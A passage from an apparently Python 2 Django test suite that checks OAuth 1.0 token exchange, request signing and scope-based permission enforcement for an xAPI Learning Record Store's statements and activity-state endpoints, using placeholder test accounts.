"oauth_token=\"%s\","\ "oauth_signature_method=\"PLAINTEXT\","\ "oauth_signature=\"%s&%s\","\ "oauth_timestamp=\"%s\","\ "oauth_nonce=\"87654321\","\ "oauth_version=\"1.0\","\ "oauth_verifier=\"%s\"" % (self.consumer.key,token.key,self.consumer.secret,request_token.secret,str(int(time.time())),request_token.verifier) access_resp = self.client.get(TOKEN_ENDPOINT, Authorization=oauth_header_access_params) self.assertEqual(access_resp.status_code, 200) content = access_resp.content.split('&') access_token_secret = content[0].split('=')[1] access_token_key = content[1].split('=')[1] access_token = Token.objects.get(secret=access_token_secret, key=access_token_key) # ============================================================== # Test ACCESS RESOURCE oauth_header_resource_params = "OAuth realm=\"test\", "\ "oauth_consumer_key=\"%s\","\ "oauth_token=\"%s\","\ "oauth_signature_method=\"HMAC-SHA1\","\ "oauth_timestamp=\"%s\","\ "oauth_nonce=\"accessresourcenonce\","\ "oauth_version=\"1.0\"" % (self.consumer.key, access_token.key, str(int(time.time()))) # from_token_and_callback takes a dictionary param_list = oauth_header_resource_params.split(",") oauth_header_resource_params_dict = {} for p in param_list: item = p.split("=") oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # from_request ignores realm, must remove so not input to from_token_and_callback del oauth_header_resource_params_dict['OAuth realm'] path = TEST_SERVER + "/XAPI/statements" oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='GET', http_url=path, parameters=oauth_header_resource_params_dict) # Create signature and add it to the headers signature_method = oauth.SignatureMethod_HMAC_SHA1() signature = signature_method.sign(oauth_request, self.consumer, access_token) oauth_header_resource_params += ',oauth_signature="%s"' % signature resp = self.client.get(path, Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0") self.assertEqual(resp.status_code, 200) def test_unicode(self): # All client requests have the auth as unicode # ============= INITIATE ============= param = { 'scope':'all', 'consumer_name':'new_client' } request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(param)) # Header params we're passing in oauth_header_request_token_params = "OAuth realm=\"test\","\ "oauth_consumer_key=\"%s\","\ "oauth_signature_method=\"HMAC-SHA1\","\ "oauth_timestamp=\"%s\","\ "oauth_nonce=\"12345678\","\ "oauth_version=\"1.0\","\ "oauth_callback=\"http://example.com/access_token_ready\"" % (self.consumer.key,str(int(time.time()))) # Make the params into a dict to pass into from_consumer_and_token request_token_param_list = oauth_header_request_token_params.split(",") oauth_header_request_token_params_dict = {} for p in request_token_param_list: item = p.split("=") oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # get_oauth_request in views ignores realm, must remove so not input to from_token_and_callback del oauth_header_request_token_params_dict['OAuth realm'] # add scope to the existing params oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET', http_url=request_token_path, parameters=oauth_header_request_token_params_dict) # create signature and add it to the header params signature_method = oauth.SignatureMethod_HMAC_SHA1() signature = signature_method.sign(oauth_request, self.consumer, None) oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature request_resp = self.client.get(request_token_path, Authorization=unicode(oauth_header_request_token_params)) self.assertEqual(request_resp.status_code, 200) self.assertIn('oauth_token_secret', request_resp.content) self.assertIn('oauth_token', request_resp.content) self.assertIn('oauth_callback_confirmed', request_resp.content) token = Token.objects.get(consumer=self.consumer) # ============= END INITIATE ============= # ============= AUTHORIZE ============= param = {'oauth_token': token.key} authorize_path = "%s?%s" % (AUTHORIZATION_ENDPOINT, urllib.urlencode(param)) auth_resp = self.client.get(authorize_path) self.assertEqual(auth_resp.status_code, 302) self.assertIn('http://testserver/accounts/login?next=/XAPI/OAuth/authorize%3F', auth_resp['Location']) self.assertIn(token.key, auth_resp['Location']) self.client.login(username='jane', password='toto') self.assertEqual(token.is_approved, False) # After being redirected to login and logging in again, try get again auth_resp = self.client.get(authorize_path) self.assertEqual(auth_resp.status_code, 200) # Show return/display OAuth authorized view auth_form = auth_resp.context['form'] data = auth_form.initial data['authorize_access'] = 1 data['oauth_token'] = token.key auth_post = self.client.post(AUTHORIZATION_ENDPOINT, data) self.assertEqual(auth_post.status_code, 302) # Check if oauth_verifier and oauth_token are returned self.assertIn('http://example.com/access_token_ready?oauth_verifier=', auth_post['Location']) self.assertIn('oauth_token=', auth_post['Location']) request_token = Token.objects.get(consumer=self.consumer) self.assertIn(request_token.key, auth_post['Location']) self.assertEqual(request_token.is_approved, True) # ============= END AUTHORIZE ============= # ============= ACCESS TOKEN ============= oauth_header_access_params = "OAuth realm=\"test\","\ "oauth_consumer_key=\"%s\","\ "oauth_token=\"%s\","\ "oauth_signature_method=\"HMAC-SHA1\","\ "oauth_timestamp=\"%s\","\ "oauth_nonce=\"87654321\","\ "oauth_version=\"1.0\","\ "oauth_verifier=\"%s\"" % (self.consumer.key,token.key,str(int(time.time())),request_token.verifier) # from_token_and_callback takes a dictionary param_list = oauth_header_access_params.split(",") oauth_header_access_params_dict = {} for p in param_list: item = p.split("=") oauth_header_access_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # from_request ignores realm, must remove so not input to from_token_and_callback del oauth_header_access_params_dict['OAuth realm'] oauth_request = oauth.Request.from_token_and_callback(request_token, http_method='GET', http_url=TOKEN_ENDPOINT, parameters=oauth_header_access_params_dict) # Create signature and add it to the headers signature_method = oauth.SignatureMethod_HMAC_SHA1() signature = signature_method.sign(oauth_request, self.consumer, request_token) oauth_header_access_params += ',oauth_signature="%s"' % signature access_resp = self.client.get(TOKEN_ENDPOINT, Authorization=unicode(oauth_header_access_params)) self.assertEqual(access_resp.status_code, 200) content = access_resp.content.split('&') access_token_secret = content[0].split('=')[1] access_token_key = content[1].split('=')[1] access_token = Token.objects.get(secret=access_token_secret, key=access_token_key) # ============= END ACCESS TOKEN ============= # ============= ACCESS RESOURCE ============= oauth_header_resource_params = "OAuth realm=\"test\", "\ "oauth_consumer_key=\"%s\","\ "oauth_token=\"%s\","\ "oauth_signature_method=\"HMAC-SHA1\","\ "oauth_timestamp=\"%s\","\ "oauth_nonce=\"accessresourcenonce\","\ "oauth_version=\"1.0\"" % (self.consumer.key, access_token.key, str(int(time.time()))) # from_token_and_callback takes a dictionary param_list = oauth_header_resource_params.split(",") oauth_header_resource_params_dict = {} for p in param_list: item = p.split("=") oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # from_request ignores realm, must remove so not input to from_token_and_callback del oauth_header_resource_params_dict['OAuth realm'] path = TEST_SERVER + "/XAPI/statements" oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='GET', http_url=path, parameters=oauth_header_resource_params_dict) # Create signature and add it to the headers signature_method = oauth.SignatureMethod_HMAC_SHA1() signature = signature_method.sign(oauth_request, self.consumer, access_token) oauth_header_resource_params += ',oauth_signature="%s"' % signature resp = self.client.get(path, Authorization=unicode(oauth_header_resource_params), X_Experience_API_Version="1.0.0") self.assertEqual(resp.status_code, 200) def test_oauth_disabled(self): # Disable oauth if settings.OAUTH_ENABLED: settings.OAUTH_ENABLED = False put_guid = str(uuid.uuid1()) stmt = json.dumps({"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bill"}, "verb":{"id": "http://adlnet.gov/expapi/verbs/accessed","display": {"en-US":"accessed"}}, "object": {"id":"act:test_put"}}) param = {"statementId":put_guid} path = "%s?%s" % ('http://testserver/XAPI/statements', urllib.urlencode(param)) oauth_header_resource_params, access_token = self.oauth_handshake() # from_token_and_callback takes a dictionary param_list = oauth_header_resource_params.split(",") oauth_header_resource_params_dict = {} for p in param_list: item = p.split("=") oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # from_request ignores realm, must remove so not input to from_token_and_callback del oauth_header_resource_params_dict['OAuth realm'] oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='PUT', http_url=path, parameters=oauth_header_resource_params_dict) # build signature and add to the params signature_method = oauth.SignatureMethod_HMAC_SHA1() signature = signature_method.sign(oauth_request, self.consumer, access_token) oauth_header_resource_params += ',oauth_signature="%s"' % signature # Put statements resp = self.client.put(path, data=stmt, content_type="application/json", Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0") self.assertEqual(resp.status_code, 400) self.assertEqual(resp.content, "OAuth is not enabled. To enable, set the OAUTH_ENABLED flag to true in settings") def test_stmt_put(self): # build stmt data and path put_guid = str(uuid.uuid1()) stmt = json.dumps({"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bill"}, "verb":{"id": "http://adlnet.gov/expapi/verbs/accessed","display": {"en-US":"accessed"}}, "object": {"id":"act:test_put"}}) param = {"statementId":put_guid} path = "%s?%s" % ('http://testserver/XAPI/statements', urllib.urlencode(param)) # Get oauth header params and access token oauth_header_resource_params, access_token = self.oauth_handshake() # from_token_and_callback takes a dictionary param_list = oauth_header_resource_params.split(",") oauth_header_resource_params_dict = {} for p in param_list: item = p.split("=") oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # from_request ignores realm, must remove so not input to from_token_and_callback del oauth_header_resource_params_dict['OAuth realm'] # Create oauth request to PUT the stmt oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='PUT', http_url=path, parameters=oauth_header_resource_params_dict) # build signature and add to the params signature_method = oauth.SignatureMethod_HMAC_SHA1() signature = signature_method.sign(oauth_request, self.consumer, access_token) oauth_header_resource_params += ',oauth_signature="%s"' % signature # Put statements resp = self.client.put(path, data=stmt, content_type="application/json", Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0") self.assertEqual(resp.status_code, 204) def test_stmt_post_no_scope(self): stmt = {"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bob"}, "verb":{"id": "http://adlnet.gov/expapi/verbs/passed","display": {"en-US":"passed"}}, "object": {"id":"act:test_post"}} stmt_json = json.dumps(stmt) # Don't send scope so it defaults to statements/write and statements/read/mine oauth_header_resource_params, access_token = self.oauth_handshake(scope=False) # from_token_and_callback takes a dictionary param_list = oauth_header_resource_params.split(",") oauth_header_resource_params_dict = {} for p in param_list: item = p.split("=") oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # from_request ignores realm, must remove so not input to from_token_and_callback del oauth_header_resource_params_dict['OAuth realm'] # Create oauth_request and apply signature oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='POST', http_url='http://testserver/XAPI/statements/', parameters=oauth_header_resource_params_dict) signature_method = oauth.SignatureMethod_HMAC_SHA1() signature = signature_method.sign(oauth_request, self.consumer, access_token) oauth_header_resource_params += ',oauth_signature="%s"' % signature post = self.client.post('/XAPI/statements/', data=stmt_json, content_type="application/json", Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0") self.assertEqual(post.status_code, 200) def test_stmt_simple_get(self): guid = str(uuid.uuid1()) stmt_data = {"id":guid,"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bob"}, "verb":{"id": "http://adlnet.gov/expapi/verbs/passed","display": {"en-US":"passed"}}, "object": {"id":"act:test_simple_get"}, "authority":{"objectType":"Agent", "mbox":"mailto:[email protected]"}} stmt_post = self.client.post(reverse(statements), json.dumps(stmt_data), content_type="application/json", Authorization=self.jane_auth, X_Experience_API_Version="1.0.0") self.assertEqual(stmt_post.status_code, 200) param = {"statementId":guid} path = "%s?%s" % ('http://testserver/XAPI/statements', urllib.urlencode(param)) oauth_header_resource_params, access_token = self.oauth_handshake() # from_token_and_callback takes a dictionary param_list = oauth_header_resource_params.split(",") oauth_header_resource_params_dict = {} for p in param_list: item = p.split("=") oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # from_request ignores realm, must remove so not input to from_token_and_callback del oauth_header_resource_params_dict['OAuth realm'] # Create oauth request and apply signature oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='GET', http_url=path, parameters=oauth_header_resource_params_dict) signature_method = oauth.SignatureMethod_HMAC_SHA1() signature = signature_method.sign(oauth_request, self.consumer, access_token) oauth_header_resource_params += ',oauth_signature="%s"' % signature resp = self.client.get(path, Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0") self.assertEqual(resp.status_code, 200) rsp = resp.content self.assertIn(guid, rsp) def test_stmt_complex_get(self): stmt_data = {"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bob"}, "verb":{"id": "http://adlnet.gov/expapi/verbs/passed","display": {"en-US":"passed"}}, "object": {"id":"act:test_complex_get"}, "authority":{"objectType":"Agent", "mbox":"mailto:[email protected]"}} stmt_post = self.client.post(reverse(statements), json.dumps(stmt_data), content_type="application/json", Authorization=self.jane_auth, X_Experience_API_Version="1.0.0") self.assertEqual(stmt_post.status_code, 200) param = {"activity":"act:test_complex_get"} path = "%s?%s" % ('http://testserver/XAPI/statements', urllib.urlencode(param)) oauth_header_resource_params, access_token = self.oauth_handshake() # from_token_and_callback takes a dictionary param_list = oauth_header_resource_params.split(",") oauth_header_resource_params_dict = {} for p in param_list: item = p.split("=") oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # from_request ignores realm, must remove so not input to from_token_and_callback del oauth_header_resource_params_dict['OAuth realm'] # Create oauth request and apply signature oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='GET', http_url=path, parameters=oauth_header_resource_params_dict) signature_method = oauth.SignatureMethod_HMAC_SHA1() signature = signature_method.sign(oauth_request, self.consumer, access_token) oauth_header_resource_params += ',oauth_signature="%s"' % signature resp = self.client.get(path,Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0") self.assertEqual(resp.status_code, 200) def test_stmt_get_then_wrong_scope(self): guid = str(uuid.uuid1()) stmt_data = {"id":guid,"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bob"}, "verb":{"id": "http://adlnet.gov/expapi/verbs/passed","display": {"en-US":"passed"}}, "object": {"id":"act:test_simple_get"}, "authority":{"objectType":"Agent", "mbox":"mailto:[email protected]"}} stmt_post = self.client.post(reverse(statements), json.dumps(stmt_data), content_type="application/json", Authorization=self.jane_auth, X_Experience_API_Version="1.0.0") self.assertEqual(stmt_post.status_code, 200) param = {"statementId":guid} path = "%s?%s" % ('http://testserver/XAPI/statements', urllib.urlencode(param)) oauth_header_resource_params, access_token = self.oauth_handshake(scope_type="statements/read profile") # from_token_and_callback takes a dictionary param_list = oauth_header_resource_params.split(",") oauth_header_resource_params_dict = {} for p in param_list: item = p.split("=") oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # from_request ignores realm, must remove so not input to from_token_and_callback del oauth_header_resource_params_dict['OAuth realm'] # Create oauth request and add signature to get statements oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='GET', http_url=path, parameters=oauth_header_resource_params_dict) signature_method = oauth.SignatureMethod_HMAC_SHA1() signature = signature_method.sign(oauth_request, self.consumer, access_token) oauth_header_resource_params += ',oauth_signature="%s"' % signature resp = self.client.get(path,Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0") self.assertEqual(resp.status_code, 200) rsp = resp.content self.assertIn(guid, rsp) # ============================================= # Test POST (not allowed) post_stmt = {"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bob"}, "verb":{"id": "http://adlnet.gov/expapi/verbs/passed","display": {"en-US":"passed"}}, "object": {"id":"act:test_post"}} post_stmt_json = json.dumps(post_stmt) # Use same oauth headers, change the nonce oauth_header_resource_params_dict['oauth_nonce'] = 'another_nonce' # create another oauth request oauth_request2 = oauth.Request.from_token_and_callback(access_token, http_method='POST', http_url='http://testserver/XAPI/statements/', parameters=oauth_header_resource_params_dict) signature_method2 = oauth.SignatureMethod_HMAC_SHA1() signature2 = signature_method2.sign(oauth_request2, self.consumer, access_token) # Replace old signature and add the new one oauth_header_resource_params = oauth_header_resource_params.replace('"%s"' % signature, '"%s"' % signature2) # replace headers with the nonce you added in dict oauth_header_resource_params = oauth_header_resource_params.replace('oauth_nonce="resource_nonce"','oauth_nonce="another_nonce"') post = self.client.post('/XAPI/statements/', data=post_stmt_json, content_type="application/json", Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0") self.assertEqual(post.status_code, 403) self.assertEqual(post.content, 'Incorrect permissions to POST at /statements') def test_activity_state_put_then_wrong_scope(self): url = TEST_SERVER + '/XAPI/activities/state' testagent = '{"name":"jane","mbox":"mailto:[email protected]"}' activityId = "http://www.iana.org/domains/example/" stateId = "id:the_state_id" activity = Activity(activity_id=activityId) activity.save() testparams = {"stateId": stateId, "activityId": activityId, "agent": testagent} teststate = {"test":"put activity state 1"} path = '%s?%s' % (url, urllib.urlencode(testparams)) oauth_header_resource_params, access_token = self.oauth_handshake(scope_type='state') # from_token_and_callback takes a dictionary param_list = oauth_header_resource_params.split(",") oauth_header_resource_params_dict = {} for p in param_list: item = p.split("=") oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # from_request ignores realm, must remove so not input to from_token_and_callback del oauth_header_resource_params_dict['OAuth realm'] # Create oauth request and add signature oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='PUT', http_url=path, parameters=oauth_header_resource_params_dict) signature_method = oauth.SignatureMethod_HMAC_SHA1() signature = signature_method.sign(oauth_request, self.consumer, access_token) oauth_header_resource_params += ',oauth_signature="%s"' % signature put = self.client.put(path, data=teststate, content_type="application/json", Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0") self.assertEqual(put.status_code, 204) # ========================================================== # Set up for Get guid = str(uuid.uuid1()) stmt_data = {"id":guid,"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bob"}, "verb":{"id": "http://adlnet.gov/expapi/verbs/passed","display": {"en-US":"passed"}}, "object": {"id":"act:test_simple_get"}, "authority":{"objectType":"Agent", "mbox":"mailto:[email protected]"}} stmt_post = self.client.post(reverse(statements), json.dumps(stmt_data), content_type="application/json", Authorization=self.jane_auth, X_Experience_API_Version="1.0.0") self.assertEqual(stmt_post.status_code, 200) param = {"statementId":guid} path = "%s?%s" % ('http://testserver/XAPI/statements', urllib.urlencode(param)) # Use same oauth_headers as before and change the nonce oauth_header_resource_params_dict['oauth_nonce'] = 'differ_nonce' # create another oauth request oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='GET', http_url=path, parameters=oauth_header_resource_params_dict) signature_method = oauth.SignatureMethod_HMAC_SHA1() signature2 = signature_method.sign(oauth_request, self.consumer, access_token) # Replace old signature with the new one oauth_header_resource_params_new = oauth_header_resource_params.replace('"%s"' % signature, '"%s"' % signature2) # replace headers with the nonce you added in dict new_oauth_headers = oauth_header_resource_params_new.replace('oauth_nonce="resource_nonce"','oauth_nonce="differ_nonce"') get = self.client.get(path, content_type="application/json", Authorization=new_oauth_headers, X_Experience_API_Version="1.0.0") self.assertEqual(get.status_code, 403) self.assertEqual(get.content, 'Incorrect permissions to GET at /statements') def stmt_get_then_wrong_profile_scope(self): guid = str(uuid.uuid1()) stmt_data = {"id":guid,"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bob"}, "verb":{"id": "http://adlnet.gov/expapi/verbs/passed","display": {"en-US":"passed"}}, "object": {"id":"act:test_simple_get"}, "authority":{"objectType":"Agent", "mbox":"mailto:[email protected]"}} stmt_post = self.client.post(reverse(statements), json.dumps(stmt_data), content_type="application/json", Authorization=self.jane_auth, X_Experience_API_Version="1.0.0") self.assertEqual(stmt_post.status_code, 200) param = {"statementId":guid} path = "%s?%s" % ('http://testserver/XAPI/statements', urllib.urlencode(param)) oauth_header_resource_params, access_token = self.oauth_handshake(scope_type="statements/read") # from_token_and_callback takes a dictionary param_list = oauth_header_resource_params.split(",") oauth_header_resource_params_dict = {} for p in param_list: item = p.split("=") oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # from_request ignores realm, must remove so not input to from_token_and_callback del oauth_header_resource_params_dict['OAuth realm'] # Create oauth request and add signature oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='GET', http_url=path, parameters=oauth_header_resource_params_dict) signature_method = oauth.SignatureMethod_HMAC_SHA1() signature = signature_method.sign(oauth_request, self.consumer, access_token) oauth_header_resource_params += ',oauth_signature="%s"' % signature resp = self.client.get(path,Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0") self.assertEqual(resp.status_code, 200) rsp = resp.content self.assertIn(guid, rsp) # =================================================================== url = 'http://testserver/XAPI/agents/profile' params = {"agent": {"mbox":"mailto:[email protected]"}} path = "%s?%s" %(url, urllib.urlencode(params)) # Use same oauth header, change nonce oauth_header_resource_params_dict['oauth_nonce'] = 'differ_nonce' # create another oauth request oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='GET', http_url=path, parameters=oauth_header_resource_params_dict) signature_method2 = oauth.SignatureMethod_HMAC_SHA1() signature2 = signature_method2.sign(oauth_request, self.consumer, access_token) # Replace signature with new one new_sig_params = oauth_header_resource_params.replace('"%s"' % signature, '"%s"' % signature2 ) # replace headers with the nonce you added in dict new_oauth_headers = new_sig_params.replace('oauth_nonce="resource_nonce"','oauth_nonce="differ_nonce"') r = self.client.get(path, Authorization=new_oauth_headers, X_Experience_API_Version="1.0.0") self.assertEqual(r.status_code, 403) def test_consumer_state(self): stmt_data = {"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bob"}, "verb":{"id": "http://adlnet.gov/expapi/verbs/passed","display": {"en-US":"passed"}}, "object": {"id":"act:test_complex_get"}, "authority":{"objectType":"Agent", "mbox":"mailto:[email protected]"}} stmt_post = self.client.post(reverse(statements), json.dumps(stmt_data), content_type="application/json", Authorization=self.jane_auth, X_Experience_API_Version="1.0.0") self.assertEqual(stmt_post.status_code, 200) param = {"object":{"objectType": "Activity", "id":"act:test_complex_get"}} path = "%s?%s" % ('http://testserver/XAPI/statements', urllib.urlencode(param)) oauth_header_resource_params, access_token = self.oauth_handshake() # from_token_and_callback takes a dictionary param_list = oauth_header_resource_params.split(",") oauth_header_resource_params_dict = {} for p in param_list: item = p.split("=") oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # from_request ignores realm, must remove so not input to from_token_and_callback del oauth_header_resource_params_dict['OAuth realm'] # Create oauth request and add signature oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='GET', http_url=path, parameters=oauth_header_resource_params_dict) signature_method = oauth.SignatureMethod_HMAC_SHA1() signature = signature_method.sign(oauth_request, self.consumer, access_token) oauth_header_resource_params += ',oauth_signature="%s"' % signature # Change the consumer state consumer = access_token.consumer consumer.status = 4 consumer.save() resp = self.client.get(path,Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0") self.assertEqual(resp.status_code, 401) self.assertEqual(resp.content, 'Invalid Consumer.') def test_simple_stmt_get_mine_only(self): guid = str(uuid.uuid1()) # Put statement normally username = "tester1" email = "[email protected]" password = "test" auth = "Basic %s" % base64.b64encode("%s:%s" % (username, password)) form = {"username":username, "email":email,"password":password,"password2":password} self.client.post(reverse(register),form, X_Experience_API_Version="1.0.0") param = {"statementId":guid} path = "%s?%s" % (reverse(statements), urllib.urlencode(param)) stmt = json.dumps({"verb":{"id": "http://adlnet.gov/expapi/verbs/passed","display": {"en-US":"passed"}}, "object": {"id":"act:test_put"},"actor":{"objectType":"Agent", "mbox":"mailto:[email protected]"}}) put_resp = self.client.put(path, stmt, content_type="application/json", Authorization=auth, X_Experience_API_Version="1.0.0") self.assertEqual(put_resp.status_code, 204) param = {"statementId":guid} path = "%s?%s" % ('http://testserver/XAPI/statements', urllib.urlencode(param)) # ==================================================== oauth_header_resource_params, access_token = self.oauth_handshake(scope_type="statements/read/mine") # From_token_and_callback takes a dictionary param_list = oauth_header_resource_params.split(",") oauth_header_resource_params_dict = {} for p in param_list: item = p.split("=") oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # from_request ignores realm, must remove so not input to from_token_and_callback del oauth_header_resource_params_dict['OAuth realm'] # Create oauth request and add signature oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='GET', http_url=path, parameters=oauth_header_resource_params_dict) signature_method = oauth.SignatureMethod_HMAC_SHA1() signature = signature_method.sign(oauth_request, self.consumer, access_token) oauth_header_resource_params += ',oauth_signature="%s"' % signature resp = self.client.get(path, Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0") self.assertEqual(resp.status_code, 403) # =================================================== # build stmt data and path oauth_agent1 = Agent.objects.get(account_name=self.consumer.key) oauth_agent2 = Agent.objects.get(mbox="mailto:[email protected]") oauth_group = Agent.objects.get(member__in=[oauth_agent1, oauth_agent2]) guid = str(uuid.uuid1()) stmt_data = {"id":guid,"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bill"}, "verb":{"id": "http://adlnet.gov/expapi/verbs/accessed","display": {"en-US":"accessed"}}, "object": {"id":"act:test_put"}, "authority":oauth_group.to_dict()} settings.ALLOW_EMPTY_HTTP_AUTH = True stmt_post = self.client.post(reverse(statements), json.dumps(stmt_data), content_type="application/json", Authorization="Basic %s" % base64.b64encode("%s:%s" % ('','')), X_Experience_API_Version="1.0.0") self.assertEqual(stmt_post.status_code, 200) param = {"statementId":guid} path = "%s?%s" % ('http://testserver/XAPI/statements', urllib.urlencode(param)) # Use same oauth headers but replace the nonce oauth_header_resource_params_dict['oauth_nonce'] = 'get_differ_nonce' # Create another oauth request, replace the signature with new one and change the nonce oauth_request2 = oauth.Request.from_token_and_callback(access_token, http_method='GET', http_url=path, parameters=oauth_header_resource_params_dict) signature_method2 = oauth.SignatureMethod_HMAC_SHA1() signature2 = signature_method2.sign(oauth_request2, self.consumer, access_token) sig = oauth_header_resource_params.replace('"%s"' % signature, '"%s"' % signature2) new_oauth_headers = sig.replace('oauth_nonce="resource_nonce"','oauth_nonce="get_differ_nonce"') get = self.client.get(path, content_type="application/json", Authorization=new_oauth_headers, X_Experience_API_Version="1.0.0") self.assertEqual(get.status_code, 200) settings.ALLOW_EMPTY_HTTP_AUTH = False def test_complex_stmt_get_mine_only(self): guid = str(uuid.uuid1()) username = "tester1" email = "[email protected]" password = "test" auth = "Basic %s" % base64.b64encode("%s:%s" % (username, password)) form = {"username":username, "email":email,"password":password,"password2":password} self.client.post(reverse(register),form, X_Experience_API_Version="1.0.0") # Put statement param = {"statementId":guid} path = "%s?%s" % (reverse(statements), urllib.urlencode(param)) stmt = json.dumps({"verb":{"id": "http://adlnet.gov/expapi/verbs/passed","display": {"en-US":"passed"}}, "object": {"id":"act:test_put"},"actor":{"objectType":"Agent", "mbox":"mailto:[email protected]"}}) put_response = self.client.put(path, stmt, content_type="application/json", Authorization=auth, X_Experience_API_Version="1.0.0") self.assertEqual(put_response.status_code, 204) # ============================================= param = {"statementId":guid} path = "%s?%s" % ('http://testserver/XAPI/statements', urllib.urlencode(param)) oauth_header_resource_params, access_token = self.oauth_handshake(scope_type="statements/read/mine") # from_token_and_callback takes a dictionary param_list = oauth_header_resource_params.split(",") oauth_header_resource_params_dict = {} for p in param_list: item = p.split("=") oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # from_request ignores realm, must remove so not input to from_token_and_callback del oauth_header_resource_params_dict['OAuth realm'] # Create oauth request and add signature oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='GET', http_url=path, parameters=oauth_header_resource_params_dict) signature_method = oauth.SignatureMethod_HMAC_SHA1() signature = signature_method.sign(oauth_request, self.consumer, access_token) oauth_header_resource_params += ',oauth_signature="%s"' % signature resp = self.client.get(path, Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0") self.assertEqual(resp.status_code, 403) # ==================================================== # Should return 0 statements since the only statement is not this user's # Use same oauth headers but replace the nonce oauth_header_resource_params_dict['oauth_nonce'] = 'differ_nonce' # Create another oauth request and add the signature oauth_request2 = oauth.Request.from_token_and_callback(access_token, http_method='GET', http_url='http://testserver/XAPI/statements', parameters=oauth_header_resource_params_dict) signature_method2 = oauth.SignatureMethod_HMAC_SHA1() signature2 = signature_method2.sign(oauth_request2, self.consumer, access_token) sig = oauth_header_resource_params.replace('"%s"' % signature, '"%s"' % signature2) new_oauth_headers = sig.replace('oauth_nonce="resource_nonce"','oauth_nonce="differ_nonce"') # Get statements get = self.client.get('http://testserver/XAPI/statements', content_type="application/json", Authorization=new_oauth_headers, X_Experience_API_Version="1.0.0") get_content = json.loads(get.content) self.assertEqual(get.status_code, 200) self.assertEqual(len(get_content['statements']), 0) # ==================================================== # Should return the newly created single statement # build stmt data and path oauth_agent1 = Agent.objects.get(account_name=self.consumer.key) oauth_agent2 = Agent.objects.get(mbox="mailto:[email protected]") oauth_group = Agent.objects.get(member__in=[oauth_agent1, oauth_agent2]) guid = str(uuid.uuid1()) stmt_data = {"id":guid,"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bill"}, "verb":{"id": "http://adlnet.gov/expapi/verbs/accessed","display": {"en-US":"accessed"}}, "object": {"id":"act:test_put"}, "authority":oauth_group.to_dict()} stmt_post = self.client.post(reverse(statements), json.dumps(stmt_data), content_type="application/json", Authorization=self.jane_auth, X_Experience_API_Version="1.0.0") self.assertEqual(stmt_post.status_code, 200) # Use same headers, change nonce oauth_header_resource_params_dict['oauth_nonce'] = 'get_differ_nonce' # Create oauth request and add signature oauth_request3 = oauth.Request.from_token_and_callback(access_token, http_method='GET', http_url='http://testserver/XAPI/statements', parameters=oauth_header_resource_params_dict) signature_method3 = oauth.SignatureMethod_HMAC_SHA1() signature3 = signature_method3.sign(oauth_request3, self.consumer, access_token) sig2 = oauth_header_resource_params.replace('"%s"' % signature, '"%s"' % signature3) new_oauth_headers2 = sig2.replace('oauth_nonce="resource_nonce"','oauth_nonce="get_differ_nonce"') # Get statements get2 = self.client.get('http://testserver/XAPI/statements', content_type="application/json", Authorization=new_oauth_headers2, X_Experience_API_Version="1.0.0") get_content2 = json.loads(get2.content) 